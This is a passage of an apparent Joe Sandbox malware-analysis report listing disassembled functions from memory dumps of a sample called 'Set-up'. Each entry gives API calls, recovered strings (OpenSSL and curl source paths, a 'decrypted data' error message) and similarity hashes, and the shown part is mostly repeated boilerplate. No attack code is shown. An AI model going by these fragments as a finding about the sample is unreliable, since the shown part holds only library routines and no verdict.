_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B869F1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86A11
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86A53
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86AB6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86AC7
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00B86ADA

Strings

UTF-8, xrefs: 00B869AF

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: _errno$abortmemcpymemset
String ID: UTF-8
API String ID: 3754757788-243350608
Opcode ID: f291c363bf0c0afe0fec9e579200669e14cf0e3f14f612d20296440be2b76d6b
Instruction ID: c1fc526fa2026c4d639e629ff95d7eac70548a9bb35edc235cce5bd3f835e5c7
Opcode Fuzzy Hash: f291c363bf0c0afe0fec9e579200669e14cf0e3f14f612d20296440be2b76d6b
Instruction Fuzzy Hash: 3A4112B0608301AFDB15AF64DC85B2B7BE5DB89314F0889ACF885873E2EA71DC44C752

Function 0080230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00802359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00802465
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008024AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008023EE

Part of subcall function 00801A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801A70

Strings

, xrefs: 00802367
, xrefs: 0080234F
Memory allocation failed for decrypted data., xrefs: 00802411
, xrefs: 0080234B

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: free$abortmallocstrlen
String ID: $ $ $Memory allocation failed for decrypted data.
API String ID: 673139954-1317699236
Opcode ID: b75e4cacdc307976debd9de4c743dd94b2a199fcd2e9d3469043b26db8035c6d
Instruction ID: 50be857f085a3cd530b28fea41fd1855d1a3a2728da2aae1b7b248a8cacd09ca
Opcode Fuzzy Hash: b75e4cacdc307976debd9de4c743dd94b2a199fcd2e9d3469043b26db8035c6d
Instruction Fuzzy Hash: 3C5192B4A047099FCB40EFA9C48599EBBF1FF88310F108959E898D7365E774D9448F92

Function 00A1E110 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A1E16C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A1E17B

Strings

Ente, xrefs: 00A1E145
crypto/ui/ui_lib.c, xrefs: 00A1E195
er , xrefs: 00A1E13D
:, xrefs: 00A1E15C
for, xrefs: 00A1E154
, xrefs: 00A1E14D

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
API String ID: 39653677-1187194756
Opcode ID: 141d80909bbfe1c79c0a82446058137c36331749c4c32840e460ba7626984858
Instruction ID: a20fcd206e7cccc2ce778c8e8d92597105b6bcfa7e247dcd2db325b0e7bf0051
Opcode Fuzzy Hash: 141d80909bbfe1c79c0a82446058137c36331749c4c32840e460ba7626984858
Instruction Fuzzy Hash: 7221DAF79042507BD210AB156C41EAB7BECDDA1394F098539FD0C86302F631C914C6E3

Function 00816330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 00816350
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(0084420E,?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 0081635B
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00816369
Sleep.KERNEL32(00000001), ref: 008163B2
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 008163BC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 008163C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0084420E,?,?), ref: 008163D6

Part of subcall function 0081D8C0: GetTickCount.KERNEL32 ref: 0081D968

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008163ED

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: 4047268905af96bae9fff60c2cd5e17f41b9bb61af174e7fe9176054af8f2091
Instruction ID: 11f093a4477479aa1cb2056609261fb14b3c8cde92c726e87008f120f4dab443
Opcode Fuzzy Hash: 4047268905af96bae9fff60c2cd5e17f41b9bb61af174e7fe9176054af8f2091
Instruction Fuzzy Hash: 3711F6A6C0021457EB1176246C42BFF735CEF95724F080634FC9892342FB219AE58393

Function 00806220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0080623A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0080624D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0080627C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00806389

Strings

hsts.c, xrefs: 008062C9, 008062DB, 00806339, 0080634B
., xrefs: 00806399

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: .$hsts.c
API String ID: 2198566249-2242870694
Opcode ID: 432dd0800d7cc597532cc6f71459232ceb9b13aad6c9b1d72833a9557b89ba39
Instruction ID: 4b7a9c26c0c56a99634f109f2d1e672169322715b1e3716d65790fd6f087a926
Opcode Fuzzy Hash: 432dd0800d7cc597532cc6f71459232ceb9b13aad6c9b1d72833a9557b89ba39
Instruction Fuzzy Hash: 0641C8B6D043546BEB607A64AC46B9B7698FF14314F090438FD4AD22C3F5B2A93886D3

Function 00B84430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 00B8447B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 00B844C4
WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 00B844E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 00B84500
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B8450B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 00B8451F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B84546

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$strcmp$AddressByteCharMultiStringWide
String ID:
API String ID: 389649969-0
Opcode ID: f5536e509e10cbf0fdb81af7292167a064fc70608476d7baaebeba8a4c00d4bb
Instruction ID: 2dd66659512d42fb1dc35cd23ed9b1a43e876402c6bb57d86bcae1ccec3ff8d6
Opcode Fuzzy Hash: f5536e509e10cbf0fdb81af7292167a064fc70608476d7baaebeba8a4c00d4bb
Instruction Fuzzy Hash: 8E3129B19043066BEB20B624DC41BFF76CCDBA1754F054268F958961A1FB75ED84C352

Function 00A42240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00A3F763,?,?,?,?,?), ref: 00A42251
WideCharToMultiByte.KERNEL32 ref: 00A42284
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00A422BD

Strings

ERR_CAPI_error, xrefs: 00A4231A
engines/e_capi.c, xrefs: 00A42299, 00A422D0, 00A42342
engines/e_capi_err.c, xrefs: 00A42321

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$wcslen
String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
API String ID: 1062461220-336193293
Opcode ID: 99a9dd8ec1e5d43ac8aa20fa498ddd6ce76c03a4567bc441b52d21d2d8a557d7
Instruction ID: 81fe4f6b80356bbf57a9bdaa4467a5f7534cf78b094c66ae473bb04582d96399
Opcode Fuzzy Hash: 99a9dd8ec1e5d43ac8aa20fa498ddd6ce76c03a4567bc441b52d21d2d8a557d7
Instruction Fuzzy Hash: 9721FBB5F483046FF7303FA2BC4AB673A68DBC0715F158139F5086A1D1E6F868488BA1

Function 00B728F0 Relevance: 10.3, APIs: 8, Instructions: 342COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000005,?,?,?,?,00B5DA6D,00000000,00E3E9B4,?,?,?,?,?), ref: 00B7299B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72A76
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00020000), ref: 00B72A82
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72AAE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00B72ABA
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B72B3F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B72C32
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000005,?,?,?,?,?,?,00B5DA6D,00000000,00E3E9B4,?,?,?,?,?), ref: 00B72CB2

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 69232ab4a5ab3cae1741d41df010a2045a502cb55e4a66e01d3fc7ccb198a963
Instruction ID: 43d5f2d030f8713af6be45b653ebe62dfa3e1c23b3a833c44226875cf3c11c93
Opcode Fuzzy Hash: 69232ab4a5ab3cae1741d41df010a2045a502cb55e4a66e01d3fc7ccb198a963
Instruction Fuzzy Hash: 9DD17E71A042149BCB18DF28C884AAE7BE5FF98314F1986ADFD6997391D770EC40CB91

Function 009B81F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0095A9CE,000000D2), ref: 009B83A3
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0095A9CE), ref: 009B83C6

Part of subcall function 009B60E0: GetLastError.KERNEL32(009B7CCC,?,00000000,009B7127,009B7CCC,00000000,009DCAB7,00801A70), ref: 009B60E3
Part of subcall function 009B60E0: SetLastError.KERNEL32(00000000), ref: 009B61A5

Strings

crypto/err/err_local.h, xrefs: 009B8311, 009B8332, 009B8385, 009B83E8, 009B84BB

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ErrorLast$strcpystrlen
String ID: crypto/err/err_local.h
API String ID: 542397150-344804083
Opcode ID: fefa955f7094c8abbcba2cc7e3e6a4e6f0c4f011c829f813b6a9bc0a9dcd8b28
Instruction ID: c90c8c90c155fcf0db7fa09b15980f42c333a87f244647dbf5f20f6da2f10ad8
Opcode Fuzzy Hash: fefa955f7094c8abbcba2cc7e3e6a4e6f0c4f011c829f813b6a9bc0a9dcd8b28
Instruction Fuzzy Hash: B68186B1900B01AFE7239F28E985BE3B7E8FB4431CF444D19E5D5872A5DB79A418CB50

Function 00806730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008073F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0080CA95,00CEAB98,00000467,mprintf.c), ref: 0080741D
Part of subcall function 008073F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00807445

Part of subcall function 008447D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 008447FB
Part of subcall function 008447D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0084480C
Part of subcall function 008447D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00844837

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00806844
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00806876
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 008068FD

Strings

hsts.c, xrefs: 00806748, 0080675D, 00806777, 0080691D, 0080694E, 0080696F
unlimited, xrefs: 0080686C
%256s "%64[^"]", xrefs: 00806857

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: strlen$feoffgetsmemcmpmemcpy
String ID: %256s "%64[^"]"$hsts.c$unlimited
API String ID: 288886899-2895786126
Opcode ID: d3497e5b143f9f68cb3b2852534b9ad70fe96eae11f8b3702cd10d79b34e028b
Instruction ID: e4478203eae0ad9e8e2d4b17498357f939412b4b311f87dfde20f35bc80ad20b
Opcode Fuzzy Hash: d3497e5b143f9f68cb3b2852534b9ad70fe96eae11f8b3702cd10d79b34e028b
Instruction Fuzzy Hash: 195118B1D443517BE760AB249C42A6B76D8FF95704F148838F848D62C2FA71EA34C793

Function 009F8240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,009F9265,?,00000400,00000000,?), ref: 009F8254
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,009F9265,?), ref: 009F8264
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,009F9265,?,?,?,?,?,?,009F9265,?,00000400,00000000,?), ref: 009F82C7

Strings

Enter PEM pass phrase:, xrefs: 009F8279, 009F828C
PEM_def_callback, xrefs: 009F82A1
crypto/pem/pem_lib.c, xrefs: 009F82A8

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
